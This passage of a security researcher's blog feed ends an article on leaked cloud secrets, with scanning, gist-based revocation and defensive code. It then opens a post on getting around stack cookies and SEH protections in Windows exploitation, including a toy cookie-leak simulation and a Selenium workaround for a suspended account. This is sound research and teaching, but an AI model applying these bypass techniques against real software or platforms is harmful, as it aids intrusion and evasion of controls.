I worked directly with Nebraska&apos;s State Information Security Officer to promptly rotate these credentials.</p><h1 id="beyond-vulnerability-discovery">Beyond Vulnerability Discovery</h1><p>An important goal I have with any research project is to approach problems holistically. For example, I not only like finding vulnerabilities, but thinking about how to address them too. Leaked secrets are a major problem- they are far easier to abuse than dangling DNS records. Was there anything I could do to mitigate abuse?</p><h2 id="piggybacking-github">Piggybacking GitHub</h2><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927124048.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="955" height="233" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Pasted-image-20240927124048.png 600w, https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927124048.png 955w" sizes="(min-width: 720px) 720px"></figure><p>I wasn&apos;t the only one trying to fix leaked secrets. GitHub&apos;s secret scanning program had already addressed this. GitHub <a href="https://docs.github.com/en/code-security/secret-scanning/introduction/supported-secret-scanning-patterns">partners with many cloud providers</a> to implement automatic revocations. Partners provide regex patterns for their secrets and an endpoint to validate/report keys. For example, if you accidentally leak your Slack token in a GitHub commit, it will be revoked in minutes. 
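To make the partner model concrete, here is a minimal sketch of what pattern-based scanning looks like. The patterns are rough illustrations (the `AKIA` + 16 uppercase alphanumerics shape for AWS access key IDs is widely documented; the Slack shape is simplified), not the regexes partners actually submit:

```python
import re

# Illustrative approximations of partner-style secret patterns.
# Real partners submit far more precise regexes to GitHub.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "slack_token": re.compile(r"\bxox[abpr]-[0-9A-Za-z-]{10,}\b"),
}

def scan_text(text):
    """Return (pattern_name, candidate_secret) pairs found in the text."""
    hits = []
    for name, pattern in SECRET_PATTERNS.items():
        for match in pattern.finditer(text):
            hits.append((name, match.group(0)))
    return hits

# AWS's own documentation uses AKIAIOSFODNN7EXAMPLE as a placeholder key ID.
sample = 'aws_key = "AKIAIOSFODNN7EXAMPLE"  # oops, committed a credential'
print(scan_text(sample))
# → [('aws_access_key_id', 'AKIAIOSFODNN7EXAMPLE')]
```

Candidates found this way are then sent to the matching partner's validation endpoint, which decides whether the key is live and worth revoking.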
This automation is critical because otherwise, attackers could search GitHub (or VirusTotal) for credentials and abuse them before the customer has an opportunity to react.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927124321.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="796" height="332" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Pasted-image-20240927124321.png 600w, https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927124321.png 796w" sizes="(min-width: 720px) 720px"></figure><p>I asked whether they could provide an endpoint for reporting keys directly. GitHub had done a great job creating relationships with vendors to automatically rotate keys. After all, I could already report a key by just posting it on GitHub, and all hosting an endpoint would do is help secure the Internet.</p><p>Unfortunately, they said no. Fortunately, I was only asking as a courtesy. I created a throwaway account and system that would use <a href="https://docs.github.com/en/rest/gists">GitHub&apos;s Gist API</a> to create a public note with a secret for only a split second. 
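That throwaway system looked roughly like the sketch below. The `POST /gists` and `DELETE /gists/{id}` endpoints are GitHub's documented REST API; the flow and helper names are a reconstruction, not my original code:

```python
import json
import urllib.request

API = "https://api.github.com"

def build_gist_payload(secret: str) -> dict:
    """A public gist whose only file contains the leaked secret."""
    return {
        "public": True,
        "description": "temporary",
        "files": {"note.txt": {"content": secret}},
    }

def flash_secret(secret: str, token: str) -> None:
    """Publish the secret publicly for a moment, then delete the gist.
    Secret scanning is triggered on creation, before the deletion lands."""
    headers = {
        "Authorization": f"token {token}",
        "Accept": "application/vnd.github+json",
    }
    req = urllib.request.Request(
        f"{API}/gists",
        data=json.dumps(build_gist_payload(secret)).encode(),
        headers=headers,
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        gist_id = json.load(resp)["id"]
    # Immediately remove the gist; the scan has already seen the content.
    delete = urllib.request.Request(
        f"{API}/gists/{gist_id}", headers=headers, method="DELETE"
    )
    urllib.request.urlopen(delete)
```
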
In theory, this would trigger GitHub&apos;s scans, and in turn a provider revocation.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927125023.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="750" height="210" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Pasted-image-20240927125023.png 600w, https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927125023.png 750w" sizes="(min-width: 720px) 720px"></figure><p>This actually worked during testing, but I ran into the above error when trying it with ~500 keys.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927125239.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="1677" height="450" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Pasted-image-20240927125239.png 600w, https://billdemirkapi.me/content/images/size/w1000/2024/09/Pasted-image-20240927125239.png 1000w, https://billdemirkapi.me/content/images/size/w1600/2024/09/Pasted-image-20240927125239.png 1600w, https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927125239.png 1677w" sizes="(min-width: 720px) 720px"></figure><p>It turns out GitHub doesn&apos;t like it when you create hundreds of Gists in a matter of minutes and suspended my account. This was a problem due to the scale of keys I was finding. Unfortunately, once a test account is flagged, most API calls fail. How can we get around this?</p><p>When debugging, I noticed something weird. For some reason, posting a Gist at the web interface, <code>https://gist.github.com</code> still worked. Even stranger? When I visited a public Gist in an incognito session, I faced a 404 error. 
It turns out that when your account is suspended, GitHub hides it (and any derivative public content like gists) from every other user. You&apos;re basically shadow banned! What&apos;s interesting is that they still allowed you to upload content through the UI, but not the API. Whatever the reason, this got me thinking...</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927125640.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="760" height="155" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Pasted-image-20240927125640.png 600w, https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927125640.png 760w" sizes="(min-width: 720px) 720px"></figure><p>Who needs an API? Using Python <a href="https://www.selenium.dev/">Selenium</a>, a library to control a browser in test suites, I created a script that automatically logged me into GitHub and used the undocumented API to publish a Gist. While my test account was still shadow banned, this was actually a feature! How? I could now create public gists that triggered secret scanning without any risk of exposure!! 
(also why I don&apos;t mind sharing the account&apos;s name or ID)</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927130237.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="1142" height="714" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Pasted-image-20240927130237.png 600w, https://billdemirkapi.me/content/images/size/w1000/2024/09/Pasted-image-20240927130237.png 1000w, https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927130237.png 1142w" sizes="(min-width: 720px) 720px"></figure><p>I used GitHub to revoke most keys I discovered, if the provider had enrolled in their program, going well beyond the minimum by protecting victims! Above is the small website I included in the name of the Gist which is embedded in key exposure notification emails. Today, any new secrets leaked on VirusTotal and a few other platforms are automatically reported, helping mitigate abuse.</p><h2 id="working-with-vendors">Working With Vendors</h2><p>Besides GitHub, I also worked with several partners directly to report leaked key material.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2024/09/05910113d82a256e07ff917ee15e5314ce1af1e2.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="869" height="436" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/05910113d82a256e07ff917ee15e5314ce1af1e2.png 600w, https://billdemirkapi.me/content/images/2024/09/05910113d82a256e07ff917ee15e5314ce1af1e2.png 869w" sizes="(min-width: 720px) 720px"><figcaption>How Providers Should Respond</figcaption></figure><p>To start, I&apos;d like to give a special thanks to the vendors who worked with me to help protect their customers. 
Above is an example of an endpoint for revoking leaked OpenAI keys. Unfortunately, the process was not so smooth in all cases. For example, AWS, the largest cloud provider by market share, refused to share the endpoint used to report leaked secrets, despite the fact that we could access it indirectly by posting a secret in a gist. This was nothing but politics getting in the way of customer security.</p><p>To add insult to injury, when AWS detects a leaked secret on GitHub, <strong>they do not revoke it</strong>. Instead, they restrict the key and create a support case with the customer, who might not even see it. The former sounds good in theory, but in practice it limits very little. It really only prevents write access, like being able to start an EC2 instance or upload files to S3 buckets. There is almost no restriction on downloading data, like a customer database backup on an S3 bucket.</p><p>Before I developed the GitHub reporting system, I used to manually email batches of keys to AWS. In late July, while preparing key metrics, I noticed a few keys in my database that I thought I had seen before. In fact, I had seen them! Many new keys my system detected were the same keys I had reported to AWS months before. 
What was going on?</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927134700.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="1197" height="571" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Pasted-image-20240927134700.png 600w, https://billdemirkapi.me/content/images/size/w1000/2024/09/Pasted-image-20240927134700.png 1000w, https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927134700.png 1197w" sizes="(min-width: 720px) 720px"></figure><blockquote>According to my estimates, ~32% of the keys I reported to you over 2-3 months ago are unrevoked and were forgotten about by your fraud team. The ~32% figure is based on the number of unique keys I reported to you by email which again appeared active at the end of July. It appears that the support cases your fraud team created in many cases were automatically resolved, leaving the keys exposed for abuse.<br><em>~ Email to AWS Security</em></blockquote><p>AWS not only fails to revoke publicly leaked secrets, but the support cases they create are horribly mismanaged. It turned out that ~32% of the keys I reported to AWS were not addressed <strong>4 months later</strong>. The reason? If the customer didn&apos;t respond, the support case for the leaked secret is automatically closed! You can see one example above I obtained while investigating a previously reported secret.</p><p>I&apos;ve continued to work with AWS on these concerns, but have yet to see any meaningful action. I suspect the choice to leave keys exposed for abuse is due to the risk of impacting legitimate workflows that depend on the key. This would be a fair concern, but what&apos;s worse, a short-term service disruption or the theft of sensitive user data?</p><p>How do I know for a fact AWS&apos; approach is unreasonable? 
Every other vendor I tested that had enrolled in secret validity checks in GitHub&apos;s program revoked leaked keys, <strong>including AWS&apos; direct competitor, Google Cloud</strong>. The ~32% unrevoked figure after 4 months also worries me because I wonder if it applies to keys on GitHub, which are easy to spot. I think this could end very badly for AWS, but at the end of the day, this is their call.</p><h1 id="where-do-we-go-from-here">Where Do We Go From Here?</h1><h2 id="takeaways">Takeaways</h2><!--kg-card-begin: markdown--><ul>
<li><strong>Security at Scale Is Not Only Offensive.</strong>
<ul>
<li>We can use the same techniques we use to find these issues to also protect against them.</li>
</ul>
</li>
<li><strong>Incentives Are Everything.</strong>
<ul>
<li>Dangling resources and leaked secrets are technically the customer&apos;s fault, but the wrong incentives are what enable them at scale.</li>
<li>At scale, the path of least resistance matters. For example, many platforms offer API tokens as default mechanisms for authentication. <strong>When it&apos;s easy to hardcode&#xA0;secrets, developers will hardcode&#xA0;secrets.</strong></li>
<li>DNS was created before cloud computing. It needs to be modernized. For example, given cross-industry collaboration in other areas, could we tie DNS records to cloud assets, automatically deleting (or at least alerting) when an associated asset is destroyed?</li>
</ul>
</li>
<li><strong>What Cloud Providers Are Missing</strong>
<ul>
<li>Limited collaboration to solve issues at the ecosystem layer.</li>
<li>Ineffective mitigations to these common vulnerability classes. We&apos;ve known about dangling DNS records for over a decade, yet the problem only seems to have grown.</li>
<li>There is a lack of urgency to address leaked secrets. For example, AWS is one of the only participants in the GitHub secret scanning program who does not automatically revoke keys that are leaked to the world. This puts customers at extreme risk.</li>
</ul>
</li>
<li><strong>How Do We Fix It? Make the path of least resistance secure by default.</strong>
<ul>
<li><strong>Hardcoded&#xA0;Secrets:</strong> Deprecate tokens for authentication. Some use cases may not be able to completely eradicate them, but add barriers to using them. Use certificate-based authentication or other secure alternatives.</li>
<li><strong>Hardcoded&#xA0;Secrets:</strong> Make it hard to abuse tokens. Examples include clearly separating tokens with read-only capability from tokens with write capability.</li>
<li><strong>Dangling Resources</strong>: Perhaps we need a new standard for tying DNS records to cloud resources. At minimum, Cloud &amp; DNS Providers should collaborate.</li>
</ul>
</li>
</ul>
<!--kg-card-end: markdown--><h2 id="how-do-i-protect-my-organization">How Do I Protect My Organization?</h2><p>In general, make it as hard as possible to use secrets insecurely within your organization. The trivial approach is to use existing tooling to scan your code for leaked secrets, but this does not address the root cause. To prevent leaks, the most effective approach is to focus on design decisions that disincentivize insecure usage of credentials.</p><p><strong>Start by understanding &quot;how is my organization currently managing secrets?&quot;</strong></p><!--kg-card-begin: markdown--><ul>
<li>For example, if a developer requires access to a backend service, what does the process for obtaining an API key look like?</li>
<li>Who is responsible for managing credentials (if anyone)?</li>
<li>What security practices is your organization following around leaked secrets?</li>
<li>Who has the authority to specify company policy?</li>
</ul>
<!--kg-card-end: markdown--><p><strong>Have a central authority for managing secrets.</strong> OWASP <a href="https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html">has an incredible cheat sheet</a> on this. I strongly recommend following their advice.</p><!--kg-card-begin: markdown--><ul>
<li>For example, have an internal service that all applications must go through to interact with a backend server.</li>
<li>You can either have this service provide other applications with credentials to use, or, for an additional layer of security, never let the API key leave the internal service.</li>
<li>Frequently rotate your credentials. With a central authority for secrets, automating this process is much more straightforward.</li>
<li>Ensure that this service has extensive auditing and logging. Look into detecting anomalous behavior.</li>
<li>Use a hardware medium (TPM) to store your secrets where possible.</li>
<li>Assign an expiration date for your keys to force a regular review of access.</li>
</ul>
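As a minimal illustration of the rotation and expiration advice above, a central secrets service can track the age of every credential and force a review once it exceeds a policy window. This is a sketch with placeholder names and an arbitrary 90-day window, not tied to any particular vault product:

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

@dataclass
class ManagedSecret:
    name: str
    issued_at: datetime
    max_age: timedelta = timedelta(days=90)  # placeholder review window

    def needs_rotation(self, now=None):
        """True once the credential is older than policy allows."""
        now = now or datetime.now(timezone.utc)
        return now - self.issued_at >= self.max_age

issued = datetime(2024, 1, 1, tzinfo=timezone.utc)
key = ManagedSecret("billing-api", issued)
print(key.needs_rotation(now=issued + timedelta(days=30)))   # → False
print(key.needs_rotation(now=issued + timedelta(days=120)))  # → True
```

With a central authority, a scheduled job can sweep all `ManagedSecret` records and trigger automated rotation for whatever `needs_rotation` flags.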
<!--kg-card-end: markdown--><p>For dangling domains, there is no one-size-fits-all solution. Generally, you should track the cloud resource associated with any DNS record you create, but this will vary depending on your environment. I believe a better solution would come at a platform/provider level, but this requires cross-industry collaboration.</p><h2 id="cloud-providers">Cloud Providers</h2><p></p><!--kg-card-begin: markdown--><ul>
<li><strong>Automatically revoke leaked secrets reported to your organization.</strong></li>
<li>If you are running a platform that provides API access for your customers, there is a lot you can do to make it harder for your customers to insecurely implement your API.</li>
<li>Allow and encourage customers to rotate their API keys automatically.</li>
<li>Allow and encourage customers to use cryptographic keys that can be stored in hardware to sign API requests.</li>
<li>Make your API keys contain a recognizable pattern. This makes it far easier for defenders to find leaked secrets.</li>
<li>Implement detections for anomalous activity.
<ul>
<li>If an API key has only performed a limited number of operations for a long period of time and suddenly begins to be used heavily, consider warning the customer about the increased usage.</li>
<li>If an API key has been used by a limited number of IP addresses for a long period of time and is used from an unrecognized location, consider warning the customer.</li>
<li>Plenty more approaches depending on the service.</li>
</ul>
</li>
<li><strong>Customers</strong>: Hold the platforms you use accountable for these practices.</li>
</ul>
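The two heuristics above can be sketched in a few lines. The thresholds are arbitrary placeholders; a real provider would tune them per customer and per service:

```python
from collections import deque

class KeyUsageMonitor:
    """Flags anomalous API-key usage: an unseen source IP, or a sudden
    spike relative to the key's historical daily call volume."""

    def __init__(self, spike_factor=10, history_days=30):
        self.known_ips = set()
        self.daily_counts = deque(maxlen=history_days)
        self.spike_factor = spike_factor

    def record_day(self, calls):
        self.daily_counts.append(calls)

    def check(self, source_ip, calls_today):
        alerts = []
        if self.known_ips and source_ip not in self.known_ips:
            alerts.append("new-source-ip")
        self.known_ips.add(source_ip)
        if self.daily_counts:
            baseline = sum(self.daily_counts) / len(self.daily_counts)
            if baseline and calls_today > self.spike_factor * baseline:
                alerts.append("usage-spike")
        return alerts

monitor = KeyUsageMonitor()
for _ in range(30):
    monitor.record_day(20)          # a month of quiet usage
monitor.check("198.51.100.7", 20)   # establishes the usual source IP
alerts = monitor.check("203.0.113.9", 5000)
print(alerts)  # → ['new-source-ip', 'usage-spike']
```
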
<!--kg-card-end: markdown--><h1 id="conclusion">Conclusion</h1><p>This article explored two common, yet critical vulnerability classes: dangling DNS records and leaked secrets. The former was well traversed, but served as a useful example of applying what I call the &quot;security at scale mindset&quot;. Instead of starting with a target, we start with the vulnerability. We demonstrated how dangling records are still a prominent issue across the Internet, despite existing for over a decade.</p><p>We then targeted hardcoded secrets, an area far less explored. By leveraging unconventional &quot;big data&quot; sources, in this case virus scanning platforms, we were able to discover secrets at an unprecedented scale. Like dangling DNS records, the root cause of these systemic weaknesses is poor incentives. The status quo of using short tokens for authentication incentivizes poor security practices, like embedding them in raw code, no matter how much we warn against it.</p><p>We finished the project by going end-to-end. Not only did we discover these problems, we mitigated a majority by taking advantage of GitHub&apos;s existing relationships and automating their UI to trigger secret revocation. It&apos;s rare to have an opportunity to directly protect victims, yet doing so is important to deterring abuse.</p><p>I&apos;d encourage you to think about the mindset we applied in this article for other types of bugs. Examples of other interesting data sources include netflow data and OSINT/publicly available data you can scrape. In general, here are two key areas to focus on:</p><ul><li>Break down traditional methods of finding a vulnerability into steps.</li><li>Correlate steps with large data sets, regardless of their intended usage.</li></ul><p>I hope you enjoyed this research as much as I did! I&apos;m so glad to have had the opportunity to share this work with you. 
Would love to hear what you think- feel free to leave a reply on the article tweet!</p>]]></content:encoded></item><item><title><![CDATA[Abusing Exceptions for Code Execution, Part 2]]></title><description><![CDATA[In this article, we'll explore how the concepts behind Exception Oriented Programming can be abused when exploiting stack overflow vulnerabilities on Windows.]]></description><link>https://billdemirkapi.me/abusing-exceptions-for-code-execution-part-2/</link><guid isPermaLink="false">63d7da6ff9f45803a6f6f0fa</guid><category><![CDATA[Security Research]]></category><dc:creator><![CDATA[Bill Demirkapi]]></dc:creator><pubDate>Mon, 30 Jan 2023 15:01:24 GMT</pubDate><media:content url="https://billdemirkapi.me/content/images/2023/01/eop2_header.png" medium="image"/><content:encoded><![CDATA[<img src="https://billdemirkapi.me/content/images/2023/01/eop2_header.png" alt="Abusing Exceptions for Code Execution, Part 2"><p><em>Full disclosure- Microsoft hired me following part 1 of this series. This research was conducted independently, and a vast majority of it was completed before I joined. Obviously, no internal information was used, and everything was built on public resources.</em></p><p>In <a href="https://billdemirkapi.me/exception-oriented-programming-abusing-exceptions-for-code-execution-part-1"><em>Abusing Exceptions for Code Execution, Part 1</em></a>, I introduced the concept of Exception Oriented Programming (EOP), which was a method of executing arbitrary operations by chaining together code from legitimate modules. The primary benefit of this approach was that the attacker would never need their shellcode to be in an executable region of memory, as the technique relied on finding the instructions of their shellcode in existing code.</p><p>The last article primarily focused on abusing this technique when you already have some form of code execution. 
Although powerful for obfuscation and evasion, the use cases provided would only be relevant when an attacker had already compromised an environment. For example, how does EOP compare to existing exploitation techniques such as Return Oriented Programming (ROP)? In this article, we&apos;ll explore how the concepts behind Exception Oriented Programming can be abused when exploiting stack overflow vulnerabilities on Windows.</p><h1 id="background">Background</h1><p>Before we can get into how EOP can help exploit stack-based attacks, it&apos;s important to know the history of the mitigations we are up against. I assume you already have familiarity with the OS-agnostic basics, such as ASLR and DEP.</p><h2 id="security-cookies">Security Cookies</h2><p>Security cookies (aka &quot;stack canaries&quot;) are a compiler mitigation introduced around two decades ago. <a href="https://learn.microsoft.com/en-us/cpp/build/reference/gs-buffer-security-check">Here</a> is a helpful summary from Microsoft&apos;s documentation:</p><blockquote>On functions that the compiler recognizes as subject to buffer overrun problems, the compiler allocates space on the stack before the return address. On function entry, the allocated space is loaded with a &#xA0;<em>security cookie</em> &#xA0;that is computed once at module load. On function exit, and during frame unwinding on 64-bit operating systems, a helper function is called to make sure that the value of the cookie is still the same. A different value indicates that an overwrite of the stack may have occurred. If a different value is detected, the process is terminated.</blockquote><p>Security cookies are relatively straightforward. 
By placing a &quot;random&quot; cookie next to the return address on the stack, attackers exploiting stack overflow vulnerabilities face a significant problem- how do you modify the return address without failing the cookie check?</p><p>Over the years, there has been lots of work put into bypassing these security cookies. I found <a href="https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/">this helpful overview</a> from the Corelan team written in 2009. Let&apos;s review some of the techniques they discuss that are still relevant to this day:</p><!--kg-card-begin: markdown--><ol>
<li>This mitigation is irrelevant if you have an overflow vulnerability in a function that does not have a security cookie check (i.e. because there are no string buffers).</li>
<li>If you have an information disclosure primitive, you could attempt to leak the security cookie for the current function from the stack <em>or</em> the security cookie in the <code>.data</code> section.
<ul>
<li>For example, if you had a string buffer and a method of getting the application to &quot;print&quot; that string, you could overflow the buffer up to the security cookie such that there is no NULL terminator. When the string is &quot;printed&quot;, all the bytes of the cookie until a NULL terminator would be returned as a part of the string.</li>
</ul>
</li>
<li>If you already have an arbitrary &quot;write-what-where&quot; primitive and know the location of the security cookie, you can overwrite it with your own, allowing you to predict the &quot;correct&quot; value to place on the stack.</li>
<li>You can still overwrite local variables on the stack to hijack control flow.
<ul>
<li>For example, if a pointer was stored on the stack (before the overflow&apos;d variable) used in a desirable operation like <code>memcpy</code> <em>after</em> the overflow occurs, you could overwrite this pointer without corrupting the security cookie.</li>
<li>Another example would be objects with &quot;virtual tables&quot; on the stack that we can overwrite. If an object&apos;s virtual table is used after the overflow occurs, an attacker could influence the target of those virtual calls. Of course, this would likely be subject to control-flow integrity mitigations like <a href="https://learn.microsoft.com/en-us/windows/win32/secbp/control-flow-guard">Control Flow Guard</a> (or xFG) on Windows.</li>
</ul>
</li>
</ol>
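The information-disclosure trick in point 2 can be illustrated with a toy simulation of the stack layout: a 16-byte buffer sitting directly below an 8-byte cookie, and a "print" primitive that reads until a NUL byte. This models memory only; it is not exploit code:

```python
import os

BUF_SIZE = 16
# The 'secret' stack cookie; NUL bytes stripped so the toy print works.
cookie = os.urandom(8).replace(b"\x00", b"\x01")

def make_frame(buffer_contents: bytes) -> bytes:
    """Model the frame: buffer, then cookie, then the rest of the stack
    (represented here by a single NUL byte)."""
    buf = buffer_contents.ljust(BUF_SIZE, b"\x00")[:BUF_SIZE]
    return buf + cookie + b"\x00"

def print_string(frame: bytes) -> bytes:
    """The disclosure primitive: 'print' the buffer up to a NUL terminator."""
    return frame[: frame.index(b"\x00")]

# Normal use: the string is NUL-terminated inside the buffer.
assert print_string(make_frame(b"hi")) == b"hi"

# Attack: fill the buffer completely so no NUL separates it from the cookie;
# the 'printed' string then runs straight into the cookie bytes.
leaked = print_string(make_frame(b"A" * BUF_SIZE))
assert leaked[BUF_SIZE:] == cookie
print("leaked cookie:", leaked[BUF_SIZE:].hex())
```

With the cookie recovered this way, a second overflow can place the correct value back on the stack and survive the cookie check.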
<!--kg-card-end: markdown--><p>Outside of these approaches, there has been extensive research into abusing exception handling. Before mitigations such as SafeSEH and SEHOP, which we will discuss soon, attackers in the context of 32-bit applications could modify &quot;exception registration records&quot; on the stack. The Corelan team covered this path of exploitation in <a href="https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/">a separate blog</a>. More recently, however, <a href="https://twitter.com/_forrestorr">@_ForrestOrr</a> wrote in detail about SEH hijacking in <a href="https://www.cyberark.com/resources/threat-research-blog/a-modern-exploration-of-windows-memory-corruption-exploits-part-i-stack-overflows">his article</a> about memory corruption bugs on Windows.</p><h2 id="seh-hijacking-and-the-mitigations-against-it">SEH Hijacking and the Mitigations Against It</h2><p>In 32-bit applications, exception registration records contain a pointer to the &quot;next&quot; SEH record on the stack and a pointer to the exception handler itself. Back in the day, attackers could hijack control flow even with security cookies by:</p><ol><li>Replacing the exception handler on the stack with their own.</li><li>Triggering an exception before the security cookie check.</li></ol><p>This would allow the attacker to call an arbitrary handler with partial control over the passed arguments.</p><h3 id="safeseh">SafeSEH</h3><p>To protect against this technique, Microsoft introduced a mitigation called <a href="https://learn.microsoft.com/en-us/cpp/build/reference/safeseh-image-has-safe-exception-handlers">SafeSEH</a>. At a high level, &quot;legitimate&quot; exception handlers are built into the binary at compile-time. 
Although an attacker can still replace the exception handler on the stack, if it is not in the module&apos;s list of exception handlers, a <code>STATUS_INVALID_EXCEPTION_HANDLER</code> exception is raised.</p><h3 id="sehop">SEHOP</h3><p><a href="https://msrc-blog.microsoft.com/2009/02/02/preventing-the-exploitation-of-structured-exception-handler-seh-overwrites-with-sehop/">SEH Overwrite Protection</a> (SEHOP) is another mitigation that would protect 32-bit applications from having their exception handlers overwritten- without requiring them to be recompiled. This approach works by adding an exception registration record at the bottom of the chain and making sure it is &quot;reachable&quot; when an exception occurs. Remember that besides the exception handler, the registration record contains a pointer to the &quot;next&quot; SEH record. If an attacker corrupts this &quot;next&quot; pointer, the chain is broken, and this final item is not reachable, preventing the attack. Of course, if an attacker can predict the &quot;next&quot; pointer successfully, this mitigation can be evaded.</p><h3 id="64-bit-applications">64-bit Applications</h3><p>64-bit applications are already protected against this attack by default, which we briefly mentioned in the <a href="https://billdemirkapi.me/exception-oriented-programming-abusing-exceptions-for-code-execution-part-1#structured-exception-handlers">last article</a> of this series:</p><blockquote>Nowadays SEH exception handling information is compiled into the binary, specifically the exception directory, detailing what regions of code are protected by an exception handler. 
When an exception occurs, this table is enumerated during an &quot;<a href="https://docs.microsoft.com/en-us/cpp/cpp/exceptions-and-stack-unwinding-in-cpp">unwinding process</a>&quot;, which checks if the code that caused the exception or any of the callers on the stack have an SEH exception handler.</blockquote><p>Since the exception handlers are built into the binary itself, there is no exception registration record on the stack that an attacker can corrupt. This prevents the existing approaches to SEH hijacking entirely.</p><h2 id="the-exception-directory">The Exception Directory</h2><p>Let&apos;s talk more about how the exception directory works in 64-bit applications.</p><p>The location of the exception directory can be retrieved by parsing the optional header of the binary, specifically the <code>IMAGE_DIRECTORY_ENTRY_EXCEPTION</code> data directory. This directory is an array of <code>IMAGE_RUNTIME_FUNCTION_ENTRY</code> structures. You can calculate the number of entries by dividing the directory size by the size of the <code>IMAGE_RUNTIME_FUNCTION_ENTRY</code> structure.</p><p>Each entry contains a begin address, end address, and the offset of an <code>UNWIND_INFO</code> structure. The begin/end addresses specify the region of code that the given entry provides information for. The <code>UNWIND_INFO</code> structure is represented by the following:</p><pre><code class="language-c">typedef struct _UNWIND_INFO {
	unsigned char Version : 3;
	unsigned char Flags : 5;
	unsigned char SizeOfProlog;
	unsigned char CountOfCodes;
	unsigned char FrameRegister : 4;
	unsigned char FrameOffset : 4;
	UNWIND_CODE UnwindCode[1];
/*  UNWIND_CODE MoreUnwindCode[((CountOfCodes+1)&amp;~1)-1];
 *  union {
 *      OPTIONAL unsigned long ExceptionHandler;
 *      OPTIONAL unsigned long FunctionEntry;
 *  };
 *  OPTIONAL unsigned long ExceptionData[];
 */
} UNWIND_INFO, * PUNWIND_INFO;
</code></pre><p>The commented region is still present in the structure, but its location depends on the size of the dynamic <code>UnwindCode</code> array. Note that most functions in an application will have a dedicated entry. This is because even if the function does not need to handle exceptions, each entry contains essential information for how the function should be unwound. For example, if function A contains an exception handler, calls function B, which does not, and an exception occurs, we still need to be able to unwind the stack to get to function A&apos;s handler.</p><p>Of note, the <code>Flags</code> field of the structure can contain the following:</p><ul><li><code>UNW_FLAG_NHANDLER</code> - The function has no handler.</li><li><code>UNW_FLAG_EHANDLER</code> - The function has an exception handler that should be called.</li><li><code>UNW_FLAG_UHANDLER</code> - The function has a termination handler that should be called when unwinding an exception.</li><li><code>UNW_FLAG_CHAININFO</code> - The FunctionEntry member is the contents of a previous function table entry.</li></ul><p>We can tell if a given function contains an exception handler by checking if the <code>Flags</code> field specifies <code>UNW_FLAG_EHANDLER</code>.</p><p>The structure&apos;s dynamic <code>UNWIND_CODE</code> array represents the operations needed to &quot;unwind&quot;/undo the changes a given function&apos;s prolog has made to the stack. We will talk about these operations in a later section when they become relevant.</p><pre><code class="language-c">typedef struct _UNWIND_INFO {
	...
/*  UNWIND_CODE MoreUnwindCode[((CountOfCodes+1)&amp;~1)-1];
 *  union {
 *      OPTIONAL unsigned long ExceptionHandler;
 *      OPTIONAL unsigned long FunctionEntry;
 *  };
 *  OPTIONAL unsigned long ExceptionData[];
 */
} UNWIND_INFO, * PUNWIND_INFO;
</code></pre><p>Going back to the definition of the <code>UNWIND_INFO</code> structure, note that there is a single field dedicated to the offset of the &quot;exception handler&quot;. When you create some code with an SEH try/except block, the address of your exception handler is not what goes into this field. Instead, every language (including C/C++) is responsible for defining a &quot;language-specific&quot; handler. In our case, <code>ExceptionHandler</code> points to the <code>__C_specific_handler</code>. These handlers have the following type definition:</p><pre><code class="language-c">typedef EXCEPTION_DISPOSITION (*PEXCEPTION_ROUTINE) (
    IN PEXCEPTION_RECORD ExceptionRecord,
    IN ULONG64 EstablisherFrame,
    IN OUT PCONTEXT ContextRecord,
    IN OUT PDISPATCHER_CONTEXT DispatcherContext
);
</code></pre><pre><code class="language-c">typedef struct _SCOPE_TABLE_AMD64 {
    DWORD Count;
    struct {
        DWORD BeginAddress;
